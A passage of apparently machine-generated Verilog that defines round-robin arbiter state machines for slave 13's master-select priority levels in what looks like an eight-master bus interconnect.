                        s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[6] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[7] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[0] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[1] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[2] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant4:
        begin
            if (  !( s13_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[5] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[6] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[7] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[0] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[1] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[2] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[3] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant5:
        begin
            if (  !( s13_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[6] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[7] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[0] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[1] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[2] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[3] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[4] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant6:
        begin
            if (  !( s13_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[7] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[0] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[1] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[2] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[3] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[4] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[5] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant7:
        begin
            if (  !( s13_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[0] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[1] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[2] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[3] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[4] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[5] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[6] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s13_msel_arb1_req = { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd1 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd1 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd1 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd1 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd1 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd1 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd1 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s13_msel_arb1_state <= s13_msel_arb1_grant0;
        end
        else
        begin 
            s13_msel_arb1_state <= s13_msel_arb1_next_state;
        end
    end
    always @ (  s13_msel_arb1_state or  { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd1 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd1 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd1 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd1 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd1 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd1 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd1 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s13_msel_arb1_next_state = s13_msel_arb1_state;
        case ( s13_msel_arb1_state ) 
        s13_msel_arb1_grant0:
        begin
            if (  !( s13_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[1] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[2] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[3] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[4] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[5] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[6] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[7] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant1:
        begin
            if (  !( s13_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[2] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[3] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[4] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[5] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[6] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[7] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[0] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant2:
        begin
            if (  !( s13_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[3] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[4] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[5] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[6] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[7] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[0] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[1] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant3:
        begin
            if (  !( s13_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[4] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[5] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[6] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[7] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[0] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[1] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[2] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant4:
        begin
            if (  !( s13_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[5] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[6] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[7] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[0] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[1] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[2] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[3] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant5:
        begin
            if (  !( s13_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[6] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[7] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[0] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[1] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[2] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[3] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[4] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant6:
        begin
            if (  !( s13_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[7] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[0] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[1] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[2] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[3] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[4] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[5] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb1_grant7:
        begin
            if (  !( s13_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s13_msel_arb1_req[0] ) 
                begin
                    s13_msel_arb1_next_state = s13_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s13_msel_arb1_req[1] ) 
                    begin
                        s13_msel_arb1_next_state = s13_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s13_msel_arb1_req[2] ) 
                        begin
                            s13_msel_arb1_next_state = s13_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s13_msel_arb1_req[3] ) 
                            begin
                                s13_msel_arb1_next_state = s13_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s13_msel_arb1_req[4] ) 
                                begin
                                    s13_msel_arb1_next_state = s13_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb1_req[5] ) 
                                    begin
                                        s13_msel_arb1_next_state = s13_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb1_req[6] ) 
                                        begin
                                            s13_msel_arb1_next_state = s13_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s13_msel_arb2_req = { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd2 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd2 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd2 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd2 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd2 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd2 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd2 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s13_msel_arb2_state <= s13_msel_arb2_grant0;
        end
        else
        begin 
            s13_msel_arb2_state <= s13_msel_arb2_next_state;
        end
    end
    always @ (  s13_msel_arb2_state or  { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd2 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd2 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd2 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd2 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd2 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd2 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd2 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s13_msel_arb2_next_state = s13_msel_arb2_state;
        case ( s13_msel_arb2_state ) 
        s13_msel_arb2_grant0:
        begin
            if (  !( s13_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[1] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[2] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[3] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[4] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[5] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[6] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[7] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant1:
        begin
            if (  !( s13_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[2] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[3] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[4] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[5] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[6] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[7] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[0] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant2:
        begin
            if (  !( s13_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[3] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[4] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[5] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[6] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[7] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[0] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[1] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant3:
        begin
            if (  !( s13_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[4] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s13_msel_arb2_req[5] ) 
                    begin
                        s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s13_msel_arb2_req[6] ) 
                        begin
                            s13_msel_arb2_next_state = s13_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s13_msel_arb2_req[7] ) 
                            begin
                                s13_msel_arb2_next_state = s13_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s13_msel_arb2_req[0] ) 
                                begin
                                    s13_msel_arb2_next_state = s13_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb2_req[1] ) 
                                    begin
                                        s13_msel_arb2_next_state = s13_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb2_req[2] ) 
                                        begin
                                            s13_msel_arb2_next_state = s13_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb2_grant4:
        begin
            if (  !( s13_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s13_msel_arb2_req[5] ) 
                begin
                    s13_msel_arb2_next_state = s13_msel_arb2_grant5;
                end
                else
                begin 
